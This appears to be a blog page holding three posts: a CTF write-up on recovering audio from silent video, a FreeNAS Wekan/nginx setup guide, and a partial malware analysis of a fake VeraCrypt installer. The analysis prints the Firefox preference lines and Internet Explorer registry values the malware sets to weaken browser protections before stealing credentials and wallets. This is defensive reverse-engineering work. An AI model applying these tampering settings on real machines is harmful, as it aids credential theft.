NorthSec 2018 CTF – Silent Meeting: Write-up

The Silent Meeting challenge at NorthSec 2018 was worth 20 points spread over only four flags. For this CTF, 20 points is a lot. And there’s a reason: this challenge went out of the box and literally asked you to recover what music was being played from a soundless video of a loudspeaker, and what people said by looking at the vibrations of a BAG OF CHIPS! Like wuuut?!

At NorthSec, I’ve been the captain of the X-Men team for several years. The team is primarily composed of Concordia University (Montreal, Canada) students, ex-students, and acquaintances. For this challenge, I worked with my girlfriend, who persisted in trying various tools.

This challenge was actually inspired by the research done at MIT in 2014 by Davis et al., which shows that it’s possible to interpret the tiny oscillations of objects filmed at a high frame rate and turn them back into sound waves. This enables someone who can only observe objects near speaking people to recover their dialogue. Indeed, when someone speaks, the waves they create in the air put pressure on the objects they encounter (like your eardrums, or plant leaves), making them oscillate slightly according to the waves.

Check this video for a quick explanation and demo:

Context

The challenge comes with the following introduction:

You joined the activist group NOYB (None Of Your Business) who are fighting against the increased national surveillance and tracking of citizens from the British government.

Your first task is to spy on the Ministry of Housing, Communities and Local Government who is concocting a plan to set up a colony on Mars on which to send the non-conforming citizens based on the merit points on their record. The plan is to listen in on the conversations held at 2 Marsham Street from a remote location in line of sight. In the past, the NOYB tried techniques such as the parabolic microphone and a laser microphone but these failed due to the Ministry playing music at their exterior glass to counteract this type of spying. But now, NOYB received from their counterpart on Artemis an ultra performant telephoto lens with glass made of ZAFO, a crystalline quartz-like structure that only forms at 0.216 of Earth gravity.

Before getting all of the details of the operation, you need to prove your wit to the group on a video with no sound, taken in a controlled environment, with the same camera that will be used for the actual mission. This camera records video at a mind boggling 2400 fps. The files that you are provided with have been slowed down 100 times.

NorthSec 2018 – Silent Meeting challenge intro

Question 1

The first video (〰.mp4) shows a loudspeaker in slow motion:

Sample from 〰.mp4

We solved this question in the dumbest way possible: just visually count the beats from the loudspeaker by playing the video at 50% speed to have enough time to keep track of them, then divide by the duration of the video. The beats were regular, confirming there was only one main frequency.

We counted about 113 beats over the 25.708 seconds of the video. As the video has been slowed down 100x according to the instructions, that means the real duration was 0.25708s. That leaves us with a tone frequency of 113/0.25708, which is about 439.55Hz. Let’s say it’s close enough to 440Hz, which is the standard A4.
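For the record, here is the same arithmetic as a small Python sketch. The numbers are the ones quoted above; the variable names are mine. It also shows how much a single miscounted beat would move the estimate, which is why rounding to 440 Hz felt safe.

```python
# Values taken from the write-up: beats counted by eye, video length, slow-down factor.
beats_counted = 113
video_duration_s = 25.708
slowdown_factor = 100

# The footage is slowed down 100x, so the real recording is 100x shorter.
real_duration_s = video_duration_s / slowdown_factor
frequency_hz = beats_counted / real_duration_s
print(f"Estimated frequency: {frequency_hz:.2f} Hz")

# Miscounting by one beat changes the estimate by 1 / real_duration_s.
error_per_beat_hz = 1 / real_duration_s
print(f"One miscounted beat shifts the estimate by {error_per_beat_hz:.2f} Hz")
```

The gap between the estimate and 440 Hz is smaller than the shift caused by one miscounted beat, so the standard A4 is the natural guess.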

The flag FLAG-freq1_440 gave us 4 points! That one was a given…

Question 2

A theoretical question that will take you back to your signal processing courses, if you ever had any.

Shannon’s sampling theorem states that when you want to sample a signal, i.e., convert the analog continuous signal to a discrete digital signal, your sampling frequency needs to be at least twice the highest frequency in the continuous signal you want to sample. If you pick a lower sampling frequency, your discrete signal will not fully characterize the continuous signal (you lose information).

In other words, if you record the state of a wave twice per second (that is, at a frequency of 2Hz), you will not be able to accurately record any frequency higher than 1Hz. This has to do with the shape of a sinusoidal wave, but can be proven mathematically as well (hence it’s a theorem).

The rolling shutter effect is mentioned in MIT’s video: when an object moves as you record it with your camera, a single video frame will capture various positions of the object in each row (due to the time it took for the camera sensor to record what it saw). This could increase the maximum frequency you can recover from a video.

Therefore in our case, without the rolling shutter effect, we are bound by Shannon’s sampling theorem. At 2400 fps, we can recover all sounds that make objects move at less than 2400/2 = 1200 Hz.
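To make the limit a bit more tangible, here is a minimal Python sketch (function names are mine, not from the challenge) that computes the Nyquist limit for a given frame rate and the frequency a pure tone would appear to have once sampled at that rate. It ignores the rolling shutter effect entirely.

```python
def nyquist_limit(sample_rate_hz: float) -> float:
    """Highest frequency that can be represented at this sampling rate."""
    return sample_rate_hz / 2


def apparent_frequency(true_hz: float, sample_rate_hz: float) -> float:
    """Frequency a pure tone appears to have after sampling (aliasing)."""
    folded = true_hz % sample_rate_hz
    # Anything above the Nyquist limit is mirrored back below it.
    return min(folded, sample_rate_hz - folded)


fps = 2400
print(nyquist_limit(fps))             # the limit used for the flag
print(apparent_frequency(440, fps))   # below the limit: unchanged
print(apparent_frequency(2000, fps))  # above the limit: folded back
```

With these numbers, a 440 Hz tone is recovered as is, while a 2000 Hz tone would be indistinguishable from a 400 Hz one in the 2400 fps footage.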

The flag FLAG-freq2_1200 was worth 1 point.

Question 3

For this question, the previous loudspeaker was playing a song (presumably), not a single tone. Manually counting the beats was going to be difficult…

So we searched for a tool that could convert a video into sound. That’s a weird thing to look for… Obviously, no quick Google search can give us what we really want. We don’t want to extract the audio of a video file, or convert the format. We want to “interpret” the audio that’s “visible” from the video.

We first started in the wrong direction. Given that the vibrations were sometimes too small for the naked eye, especially in the next video, we somehow landed on this MIT project that aims at “magnifying” details in videos: https://people.csail.mit.edu/mrub/vidmag/. We tried to run their code but didn’t understand what we were looking at…

Back on the right track: let’s look at what the MIT researchers left behind. On the project’s website, we can find the research paper, along with the Matlab code to do the video -> audio job.

It happened that we had access to a university computer with Matlab installed, so we tried the code. We simply need to adapt the vidName and vidExtension variables to point to 🎶.mp4 (it is recommended to rename this file first…), then let the program run:

Davis et al.’s Matlab program running to recover audio from the video

When prompted to select a folder, pick where you want the recovered .wav to be saved.

The program takes a while to run, and the suspense became unbearable, especially as we were running the code at 5am on the last day of the CTF, after having tried code from other authors that totally didn’t work…

Six long minutes of intense CPU activity later, boom. Matlab error. Also, we got a spectrogram of the recovered sound, and it looks like we’ve got something!

Matlab error at the end of the processing
Recovered sound’s signal and spectrogram

Don’t panic, the Matlab error is due to a function name change. Instead of wavwrite, it now should use audiowrite.

In vmWriteWAV.m, replace wavwrite(S.x, S.samplingRate, fn); by audiowrite(fn, S.x, S.samplingRate); (be careful, the argument order changed). You actually don’t need to rerun the whole program: simply run audiowrite("recoveredSound.wav", S.x, S.samplingRate); since S is already in your environment now. Here is the recovered sound:

What a joy when we could hear the recovered melody! I immediately recognized Vangelis – Conquest of paradise, featured in the 1992 film 1492: Conquest of Paradise.

We prepared the flag FLAG-song_conquestofparadise, submitted it in the morning at the CTF and got 6 points!

Question 4

Last but not least, we are now tackling the real deal in audio recovery:

The video indeed features a bag of chips:

🎥.mp4

Since we got the program running for the previous question, why not simply throw it the new video?

1m30 of CPU time, and an audio file:

The most difficult part in this question was to understand what the heck was being spoken…

Recovered audio from 🎥.mp4

We listened to the sample several times. An audiophile team member tweaked it in various ways to finally understand that the sentence was:

WE WILL DEPORT EVERYONE WITH LESS THAN TWO MERIT POINTS

This was actually related to the challenge’s context, talking about merit points:

Your first task is to spy on the Ministry of Housing, Communities and Local Government who is concocting a plan to set up a colony on Mars on which to send the non-conforming citizens based on the merit points on their record.

FLAG-deport_everyonewithlessthantwomeritpoints gave us 9 points!

4+1+6+9=20 points, and voilà! With the right tool, it wasn’t that hard.

Install Wekan+nginx (HTTPS) in a FreeNAS jail in 2020

Once again, when you try to combine an unpopular app on an unpopular platform, and you want the latest version of them, the journey is long. Today, we want a FreeNAS 11.3 jail hosting Wekan 4.01, the Trello-like kanban-style board app, behind nginx 1.18.0 with OpenSSL 1.1.1g using TLS 1.3. You may want to do that if you don’t want to share your private boards with yet another cloud company and its likely ambiguous privacy policy.

1. Create a new jail

Assuming you already have created jails in the past, your FreeNAS is ready to make new ones quickly.

Log in to your FreeNAS admin panel, go to Jails, click ADD.

Give it a name (here “wekan-test”), and select the latest release version available, then Next.

Create jail step 1

Check VNET and select either DHCP (if your router can be configured to give static DHCP lease for instance), or give it a static IP. Next. Submit.

Create jail step 2 (static IPv4 only here)

Start the jail by clicking the START button.

Jail is down, start it

Then, SSH to your FreeNAS instance, locate your Jail ID using jls, then jexec <JID> csh.

Locate jail and enter it

2. Install dependencies

Install MongoDB 4.0:

pkg install mongodb40 mongodb40-tools
sysrc mongod_enable=YES
service mongod start

Don’t worry about exposing your DB to the world: MongoDB no longer listens on 0.0.0.0 by default. It only binds to localhost and creates a local socket. sockstat -L, which leaves out loopback connections, shows only that socket:

# sockstat -L
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
mongodb mongod 99827 10 stream /tmp/mongodb-27017.sock

Install node.js 12:

pkg install node12 npm-node12 bcrypt

Make sure python2 can be found by npm:

cd /usr/local/bin
ln -s python2.7 python2

Install some other tools

pkg install nano

3. Install Wekan

Create new user

adduser

Use csh for the shell, and use an empty password. We will disable login afterwards anyway.

Plenty of questions to answer to add a new user

Fetch sources

Go to https://releases.wekan.team/ and locate the ZIP or TAR package for the latest wekan release. This is a Meteor-wrapped bundle, easier to deploy, which is different from cloning the GitHub repo.

Latest release as of April 29, 2020

Right-click, copy link address.

Back in the jail, switch to the new user wekan, fetch and decompress the archive in the user’s home directory.

su wekan
cd /home/wekan
fetch https://releases.wekan.team/wekan-4.01.zip
tar xzpf wekan-4.01.zip

Remove phantomJS

The version needed is not available on FreeBSD but Wekan works without it.

cd ~/bundle/programs/server/npm/node_modules/meteor/lucasantoniassi_accounts-lockout/node_modules
rm -rf phantomjs-prebuilt

Run npm install a first time

cd ~/bundle/programs/server
npm install

This will fail with a bcrypt error and a node-pre-gyp error.

npm cannot install bcrypt

Fix the node-pre-gyp error

rm -rf /usr/home/wekan/bundle/programs/server/node_modules/.bin/node-pre-gyp
npm install node-pre-gyp

Fix the bcrypt error

npm install bcrypt
cd npm/node_modules
mv bcrypt ~/
cd ../..
npm install
mv ~/bcrypt npm/node_modules

npm install should have completed without error this time.

Install fibers

npm install fibers

4. Configure Wekan

Make a config file

Next, we need to prepare a config file that will apply all the environment variables needed by Wekan.

Grab https://raw.githubusercontent.com/wekan/wekan/master/start-wekan.sh as /home/wekan/start-wekan.sh.

cd ~
fetch https://raw.githubusercontent.com/wekan/wekan/master/start-wekan.sh

Open the file

nano start-wekan.sh

and comment out the line cd .build/bundle at the beginning, as well as the node main.js and cd ../.. lines towards the end of the file (the surrounding while/done loop goes too):

#while true; do
      #cd .build/bundle

      [...]

      #node main.js
      # & >> ../../wekan.log
      #cd ../..
#done

Next, adjust ROOT_URL to correspond to the URL you will be using Wekan with. For instance, you could configure an entry in your hosts file to map the name wekan to the FreeNAS jail’s IP (LAN use only). Alternatively, through a DNS server on your network, you could resolve, let’s say, wekan.lan to the jail’s IP. If you’re exposing Wekan to the internet, you will probably get a domain name for it.

This will give you something like this:

      export ROOT_URL='https://my-super-wekan-setup.com'

For my example, I’ll do wekan-test.lan.

Note: this is not the IP/domain and port that Wekan will be listening on. This is the final form of the URL once served by nginx, which we will configure shortly.

Customize the local port that Wekan will be listening on, and make it bind to localhost only. This is achieved by setting the undocumented BIND_IP environment variable. You don’t want Wekan to be open to the world and directly reachable, it should go through nginx.

      export PORT=3001
      export BIND_IP=127.0.0.1

Make sure to also configure MAIL_URL, MAIL_FROM (not specified in the .sh file), WITH_API, and check other options as well.

Make it a service

Next, we want to start Wekan as a service and use the config we just made. Exit from su wekan, then edit /usr/local/etc/rc.d/wekan.

% exit
# nano /usr/local/etc/rc.d/wekan

Paste the content below into it:

#!/bin/sh
# PROVIDE: wekan
# REQUIRE: mongod nginx
# BEFORE:
# KEYWORD: shutdown

. /etc/rc.subr

name="wekan"
rcvar="wekan_enable"
pidfile="/var/run/${name}.pid"

. /home/wekan/start-wekan.sh
cd /home/wekan/bundle
command="/usr/sbin/daemon"
command_args="-P ${pidfile} -u wekan -r /usr/local/bin/node main.js"

load_rc_config $name
: ${wekan_enable:="NO"}

run_rc_command "$1"

Save and exit. Set the proper permissions:

chmod 555 /usr/local/etc/rc.d/wekan

Enable and start the service.

sysrc wekan_enable=yes
service wekan start

At this point, Wekan should be running, but is only accessible on localhost. One way to test if things are running well is to netcat to localhost on port 3001 (as configured in your start-wekan.sh) and send a simple HTTP request.

# nc localhost 3001
GET / HTTP/1.1
Host: wekan-test.lan
Accept: */*


Check if Wekan is alive
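If you prefer something scriptable over typing the request into nc, the same probe can be sketched in Python. This assumes Python 3 is available in the jail (the steps above do not install it), and the function names are mine. The port and Host header are the values used in this guide.

```python
import socket


def build_probe(host_header: str) -> bytes:
    """Build the same minimal HTTP/1.1 request as the nc example."""
    lines = [
        "GET / HTTP/1.1",
        f"Host: {host_header}",
        "Accept: */*",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def probe(host: str = "127.0.0.1", port: int = 3001,
          host_header: str = "wekan-test.lan", timeout: float = 5.0) -> str:
    """Send the request and return the status line of the response."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_probe(host_header))
        data = b""
        # Read until the end of the first line (the status line).
        while b"\r\n" not in data:
            chunk = sock.recv(1024)
            if not chunk:
                break
            data += chunk
    return data.split(b"\r\n", 1)[0].decode("latin-1")
```

Calling probe() from inside the jail should return an HTTP status line if Wekan is up, and raise a connection error otherwise.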

Let’s now disable wekan login:

chsh -s /usr/sbin/nologin wekan

5. Install Nginx

Let’s assume you want the latest nginx version available, with support for TLS 1.3, and you don’t care about legacy clients. You can’t just pkg install nginx. You will get an older version compiled against a version of OpenSSL that doesn’t even support TLS 1.3. You’d not be happy.

Fetch the latest OpenSSL source

Go to https://www.openssl.org/source/ and get the link to the .tar.gz file corresponding to the latest v1.1 release.

OpenSSL download page

Today, this is https://www.openssl.org/source/openssl-1.1.1g.tar.gz.

Fetch the source:

cd /tmp
fetch https://www.openssl.org/source/openssl-1.1.1g.tar.gz
tar zxvf openssl-1.1.1g.tar.gz

Fetch the latest nginx source

Similarly, go to https://nginx.org/en/download.html and get the link to the .tar.gz file corresponding to the latest stable release.

Get the latest nginx stable source

Today, this is https://nginx.org/download/nginx-1.18.0.tar.gz.

Fetch the source.

cd /tmp
fetch https://nginx.org/download/nginx-1.18.0.tar.gz
tar zxvf nginx-1.18.0.tar.gz

Compile nginx with OpenSSL

Note: adjust the path to OpenSSL in --with-openssl= accordingly. Also, the list of nginx modules is short but should be enough to run Wekan (it is probably even overkill).

pkg install perl5
cd nginx-1.18.0
./configure --prefix=/usr/local/etc/nginx --with-cc-opt='-I /usr/local/include' --with-ld-opt='-L /usr/local/lib' --conf-path=/usr/local/etc/nginx/nginx.conf --sbin-path=/usr/local/sbin/nginx --pid-path=/var/run/nginx.pid --error-log-path=/var/log/nginx/error.log --user=www --group=www --modules-path=/usr/local/libexec/nginx --with-file-aio --http-client-body-temp-path=/var/tmp/nginx/client_body_temp --http-proxy-temp-path=/var/tmp/nginx/proxy_temp --http-log-path=/var/log/nginx/access.log --with-http_v2_module --with-http_addition_module --with-http_auth_request_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_realip_module --with-pcre --with-http_slice_module --with-http_ssl_module --with-openssl=../openssl-1.1.1g --with-http_stub_status_module --with-http_sub_module --with-threads
make
make install

Then test it:

# nginx -V
nginx version: nginx/1.18.0
built by clang 8.0.0 (tags/RELEASE_800/final 356365) (based on LLVM 8.0.0)
built with OpenSSL 1.1.1g  21 Apr 2020
TLS SNI support enabled
configure arguments: [...]

Configure nginx

Since we will overwrite the existing config, I find it easier to just delete nginx config file and recreate it:

rm /usr/local/etc/nginx/nginx.conf
touch /usr/local/etc/nginx/nginx.conf
chown root:wheel /usr/local/etc/nginx/nginx.conf
chmod 644 /usr/local/etc/nginx/nginx.conf

Edit this config file:

nano /usr/local/etc/nginx/nginx.conf

Paste the following content in the file:

user  www;

events {
	worker_connections 10;
	# multi_accept on;
}

http {
    # this section is needed to proxy web-socket connections
    map $http_upgrade $connection_upgrade {
        default upgrade;
        ''      close;
    }

    ##
    # Basic Settings
    ##
    include       mime.types;
    default_type  application/octet-stream;
    client_max_body_size 100M;
    server_tokens off;
    charset utf-8;
    sendfile on;
    keepalive_timeout 60;
    gzip on;

    ##
    # Logging Settings
    ##
    log_format  main  '$remote_addr - $remote_user [$time_local] "$request" '
                      '$status $body_bytes_sent "$http_referer" '
                      '"$http_user_agent" "$http_x_forwarded_for"';
    #if logging requests is needed
    #access_log  /var/log/access.log  main;
    access_log off;
    error_log /var/log/nginx/error.log;

    server {
        listen       443 ssl http2;
        server_name  wekan-test.lan;

        ##
        # SSL Settings
        ##
        ssl_certificate     /usr/local/etc/ssl/wekan.crt;
        ssl_certificate_key /usr/local/etc/ssl/wekan.key;
        #ssl_password_file   /usr/local/etc/ssl/pass.txt;

        ssl_protocols       TLSv1.3;
        #if clients can't connect (because they don't support TLSv1.3), use:
        #ssl_protocols       TLSv1.3 TLSv1.2;

        #TLS 1.3 and FS TLS 1.2 ciphersuites with EC certificates only
        ssl_ciphers         "TLS_CHACHA20_POLY1305:TLS_AES_128_GCM_SHA256:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES128-GCM-SHA256";
        ssl_ecdh_curve      X25519:secp521r1:secp384r1;

        # if using a browser-trusted certificate
        #ssl_stapling on;
        #ssl_stapling_verify on;

        ssl_session_timeout 1h;
        ssl_session_cache shared:SSL:30m;
        ssl_session_tickets off;
        add_header Strict-Transport-Security "max-age=31536000;";
        add_header X-Frame-Options SAMEORIGIN;
        add_header X-Content-Type-Options nosniff;
        add_header X-XSS-Protection "1; mode=block";

        # Pass requests to Wekan.
        # If you have Wekan at https://example.com/wekan , change location to:
        # location /wekan {
        location / {
            # proxy_pass http://127.0.0.1:3001/wekan;
            proxy_pass http://127.0.0.1:3001; # local Wekan instance
            proxy_http_version 1.1;
            proxy_set_header Upgrade $http_upgrade; # allow websockets
            proxy_set_header Connection $connection_upgrade;
            proxy_redirect off;
            proxy_set_header Host $host;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

            # this setting allows the browser to cache the application in a way compatible with Meteor
            # on every application update the name of CSS and JS file is different, so they can be cache infinitely (here: 30 days)
            # the root path (/) MUST NOT be cached
            #if ($uri != '/wekan') {
            #    expires 30d;
            #}
        }
    }
}

At this point, you should customize server_name:

server_name my-super-wekan-setup.com;

and your TLS certificate/private key (use EC certificates preferably, otherwise adapt ssl_ciphers):

ssl_certificate /usr/local/etc/ssl/wekan.crt;
ssl_certificate_key /usr/local/etc/ssl/wekan.key;

You can either use your own self-signed certificate or PKI, or get a browser-trusted certificate from Let’s Encrypt and automate the renewal using certbot. This is a separate exercise.

Make sure that the proxy_pass also reflects the port Wekan is listening on:

proxy_pass http://127.0.0.1:3001;

Create the parent folder for nginx’s temporary files (client_body_temp, proxy_temp):

mkdir /var/tmp/nginx
chown www:www /var/tmp/nginx

Check the config:

nginx -t

Make nginx a service

This is needed since we did not install nginx with pkg install. You can skip this step if you first pkg install nginx, then overwrite the installation with make install.

nano /usr/local/etc/rc.d/nginx

Copy the following:

#!/bin/sh
# $FreeBSD: branches/2020Q2/www/nginx/files/nginx.in 518572 2019-11-28 10:17:37Z joneum $

# PROVIDE: nginx
# REQUIRE: LOGIN cleanvar
# KEYWORD: shutdown

#
# Add the following lines to /etc/rc.conf to enable nginx:
# nginx_enable (bool):		Set to "NO" by default.
#				Set it to "YES" to enable nginx
# nginx_profiles (str):		Set to "" by default.
#				Define your profiles here.
# nginx_pid_prefix (str):	Set to "" by default.
#				When using profiles manually assign value to "nginx_"
#				for prevent collision with other PIDs names.
# nginxlimits_enable (bool):	Set to "NO" by default.
#				Set it to yes to run `limits $limits_args`
#				just before nginx starts.
# nginx_flags (str):		Set to "" by default.
#				Extra flags passed to start command.
# nginxlimits_args (str):	Default to "-e -U www"
#				Arguments of pre-start limits run.
# nginx_http_accept_enable (bool): Set to "NO" by default.
#				Set to yes to check for accf_http kernel module
#				on start-up and load if not loaded.

. /etc/rc.subr

name="nginx"
rcvar=nginx_enable

start_precmd="nginx_precmd"
restart_precmd="nginx_checkconfig"
reload_precmd="nginx_checkconfig"
configtest_cmd="nginx_checkconfig"
gracefulstop_cmd="nginx_gracefulstop"
upgrade_precmd="nginx_checkconfig"
upgrade_cmd="nginx_upgrade"
command="/usr/local/sbin/nginx"
_pidprefix="/var/run"
pidfile="${_pidprefix}/${name}.pid"
_tmpprefix="/var/tmp/nginx"
required_files=/usr/local/etc/nginx/nginx.conf
extra_commands="reload configtest upgrade gracefulstop"

[ -z "$nginx_enable" ]		&& nginx_enable="NO"
[ -z "$nginxlimits_enable" ]	&& nginxlimits_enable="NO"
[ -z "$nginxlimits_args" ]	&& nginxlimits_args="-e -U www"
[ -z "$nginx_http_accept_enable" ] && nginx_http_accept_enable="NO"

load_rc_config $name

if [ -n "$2" ]; then
	profile="$2"
	if [ "x${nginx_profiles}" != "x" ]; then
		pidfile="${_pidprefix}/${nginx_pid_prefix}${profile}.pid"
		eval nginx_configfile="\${nginx_${profile}_configfile:-}"
		if [ "x${nginx_configfile}" = "x" ]; then
			echo "You must define a configuration file (nginx_${profile}_configfile)"
			exit 1
		fi
		required_files="${nginx_configfile}"
		eval nginx_enable="\${nginx_${profile}_enable:-${nginx_enable}}"
		eval nginx_flags="\${nginx_${profile}_flags:-${nginx_flags}}"
		eval nginxlimits_enable="\${nginxlimits_${profile}_enable:-${nginxlimits_enable}}"
		eval nginxlimits_args="\${nginxlimits_${profile}_args:-${nginxlimits_args}}"
		nginx_flags="-c ${nginx_configfile} -g \"pid ${pidfile};\" ${nginx_flags}"
	else
		echo "$0: extra argument ignored"
	fi
else
	if [ "x${nginx_profiles}" != "x" -a "x$1" != "x" ]; then
		for profile in ${nginx_profiles}; do
			echo "===> nginx profile: ${profile}"
			/usr/local/etc/rc.d/nginx $1 ${profile}
			retcode="$?"
			if [ "0${retcode}" -ne 0 ]; then
				failed="${profile} (${retcode}) ${failed:-}"
			else
				success="${profile} ${success:-}"
			fi
		done
		exit 0
	fi
fi

# tmpfs(5)
nginx_checktmpdir()
{
	if [ ! -d ${_tmpprefix} ] ; then
		install -d -o www -g www -m 755 ${_tmpprefix}
	fi
}

nginx_checkconfig()
{
	nginx_checktmpdir

	echo "Performing sanity check on nginx configuration:"
	eval ${command} ${nginx_flags} -t
}

nginx_gracefulstop()
{
	echo "Performing a graceful stop:"
	sig_stop="QUIT"
	run_rc_command ${rc_prefix}stop $rc_extra_args || return 1
}

nginx_upgrade()
{
	echo "Upgrading nginx binary:"

	reload_precmd=""
	sig_reload="USR2"
	run_rc_command ${rc_prefix}reload $rc_extra_args || return 1

	sleep 1

	echo "Stopping old binary:"

	sig_reload="QUIT"
	pidfile="$pidfile.oldbin"
	run_rc_command ${rc_prefix}reload $rc_extra_args || return 1
}

nginx_precmd() 
{
	if checkyesno nginx_http_accept_enable
	then
		required_modules="$required_modules accf_http accf_data"
	fi

	nginx_checkconfig

	if checkyesno nginxlimits_enable
	then
		eval `/usr/bin/limits ${nginxlimits_args}` 2>/dev/null
	else
		return 0
	fi
}

run_rc_command "$1"

Give it the right permissions:

chmod 555 /usr/local/etc/rc.d/nginx

Enable the service and start it!

sysrc nginx_enable=yes
service nginx start

Access your Wekan

Now visit your Wekan’s URL.

Wekan is running over HTTPS
Wekan is running with TLS 1.3
Everything runs as the latest version \o/
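To double-check the TLS version without relying on the browser’s padlock dialog, here is a small Python sketch to run from a client machine (Python 3.7+ assumed; function names are mine). It refuses anything older than TLS 1.3, so a successful connection is itself the proof. Set verify=False only if you use a self-signed certificate.

```python
import socket
import ssl


def tls13_only_context(verify: bool = True) -> ssl.SSLContext:
    """Client context that refuses to negotiate anything below TLS 1.3."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_3
    if not verify:
        # For self-signed certificates: skip hostname and chain validation.
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    return ctx


def negotiated_tls_version(host: str, port: int = 443,
                           verify: bool = True, timeout: float = 5.0) -> str:
    """Connect to host:port and return the negotiated protocol version."""
    ctx = tls13_only_context(verify)
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            return tls.version()
```

For my setup, negotiated_tls_version("wekan-test.lan", verify=False) is the call I would use; it should report TLSv1.3 if nginx is configured as above.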

Ultimate test: restart your jail to see if Wekan comes back alive automatically.

Post-scriptum notes

Keep wekan, nginx and openssl updated. Unfortunately, the way we installed the latest versions will prevent us from using a simple pkg upgrade to keep everything up-to-date 😦

Sources

https://www.gitmemory.com/issue/wekan/wekan/2662/538795856
https://github.com/wekan/wekan/wiki/Meteor-bundle
https://github.com/wekan/bundle/blob/master/programs/server/packages/webapp.js#L1196
https://github.com/wekan/wekan/issues/2662
https://github.com/wekan/wekan/wiki/Nginx-Webserver-Config

An Analysis of Modified VeraCrypt binaries (Part 3)

Continuing and finishing the analysis of the fake VeraCrypt Windows installer distributed on httx://vera-crypt[.]com, I am now reverse-engineering data.dll, which again tries to download another payload from a C2 server. Problem: the server is down. Instead, I’m focusing on recovering an old payload from the same malware family, which I decipher from a PCAP by brute-forcing its weak encryption key. In the end, the payloads perform man-in-the-browser to analyze the traffic by hooking network functions, and they steal the victim’s saved credentials and cryptocurrency wallets!

Part 2 summary: [ID].exe performs a number of checks to make sure the binary is not being analyzed. It loads big_log in a convoluted way, which decrypts data.dll in memory and jumps to it. In turn, data.dll (not the function data() from Part 1) executes more anti-analysis checks, decrypts hundreds of strings, and dynamically loads a bunch of library functions.

data.dll: Payload or not yet?

Now that we have reconstructed the variable names and library function names, figured out the anti-analysis functions, we can get an overview of the start function.

data.dll start function

A mutex named after the ID is created, then released immediately. The program terminates if the mutex already exists. I’m not sure what the intent is here, since nothing useful happens while the mutex is owned. If this is a way to prevent the program from running twice in parallel, this does not do the job…

The only remaining function to explore is sub_405AA8 (hereafter named main_stuff).

This will gradually become more interesting, I promise.

Main payload, several functions to analyze

Let’s start with the first function: sub_4055E5. It targets… Firefox!

Firefox preferences

data.dll loads %appdata%\Mozilla\Firefox\profiles.ini, which describes the profile paths for Firefox, then gets the path of the first profile found, and opens its prefs.js, which in turn contains the preferences for Firefox. The following settings are appended:

user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled", false);
user_pref("browser.tabs.remote.autostart", false);
user_pref("browser.tabs.remote.autostart.2", false);
user_pref("gfx.direct2d.disabled", true);
user_pref("layers.acceleration.disabled", true);#89D5ACAA6B4C4765CFD8F8

The modified preferences disable the SPDY protocol. I have seen this behavior in Wajam, which was doing man-in-the-middle of HTTPS traffic and did not handle SPDY until a later version. This suggests that this piece of malware may tamper with network traffic.

The multi-process windows feature in Firefox is also disabled, meaning that instead of spawning a new process per tab, all tabs stay in the same process. This could simplify a process injection kind of thing.

Finally, hardware acceleration is disabled. That, I’m not sure why. Maybe the malware tries to screenshot pages and can’t otherwise? Weird…
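As a side note, checking whether a given Firefox profile carries these appended lines is easy to script. Below is a minimal Python sketch that parses the text of the profile’s preferences file and reports which of the seven settings listed above are present with the tampered value. The function names and the simple regex are mine; it is not a full parser of the preferences syntax.

```python
import re

# Preference values the sample appends, as listed above.
TAMPERED_PREFS = {
    "network.http.spdy.enabled.v3-1": "false",
    "network.http.spdy.enabled.v3": "false",
    "network.http.spdy.enabled": "false",
    "browser.tabs.remote.autostart": "false",
    "browser.tabs.remote.autostart.2": "false",
    "gfx.direct2d.disabled": "true",
    "layers.acceleration.disabled": "true",
}

# Matches lines such as: user_pref("some.name", value);
USER_PREF_RE = re.compile(r'user_pref\("([^"]+)",\s*([^)]+?)\s*\);')


def parse_user_prefs(text: str) -> dict:
    """Map each preference name to its raw value; later lines win."""
    return {name: value for name, value in USER_PREF_RE.findall(text)}


def tampered_prefs(text: str) -> list:
    """Names of the listed preferences that hold the tampered value."""
    prefs = parse_user_prefs(text)
    return sorted(name for name, value in TAMPERED_PREFS.items()
                  if prefs.get(name) == value)
```

A profile where all seven names come back is a strong hint, although a user could of course have set some of them on purpose.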

Internet Explorer settings

Similarly, IE settings are modified.

Under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main, TabProcGrowth is set to 0. This may have to do with running a 32-bit add-on in 64-bit IE. Looking forward to that add-on!

Also, IE’s ProtectedMode is disabled by setting NoProtectedModeBanner to 1, and HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 to 3.

Randomness, mask and proxy

The next function sub_40460C does a bunch of things.

First, it generates a random 9-character string by using a simple rand() function seeded with the Performance Counter, a high-resolution time stamp.

This random string is hashed with MD5 to give a first digest, which I called randomNameMd5. It is further hashed to give randomNameMd5Md5. Those will be used later.
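In Python terms, the derivation looks roughly like the sketch below. Several details are assumptions on my side: the alphabet of the random string, Python’s random module standing in for the C rand(), and the second MD5 being computed over the hex string of the first one rather than over the raw digest.

```python
import hashlib
import random
import string
import time


def random_name(length: int = 9, seed=None) -> str:
    """Random string from a PRNG seeded with a high-resolution counter."""
    # perf_counter_ns() plays the role of the Performance Counter here.
    rng = random.Random(time.perf_counter_ns() if seed is None else seed)
    # Assumption: lowercase letters; the real alphabet may differ.
    return "".join(rng.choice(string.ascii_lowercase) for _ in range(length))


def md5_hex(text: str) -> str:
    """MD5 digest of an ASCII string, as 32 hex characters."""
    return hashlib.md5(text.encode("ascii")).hexdigest()


name = random_name()
random_name_md5 = md5_hex(name)
# Assumption: the second hash is taken over the hex string of the first.
random_name_md5_md5 = md5_hex(random_name_md5)
print(name, random_name_md5, random_name_md5_md5)
```

Note that everything here is derived from the seed: the same counter value always gives the same string and the same two digests.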

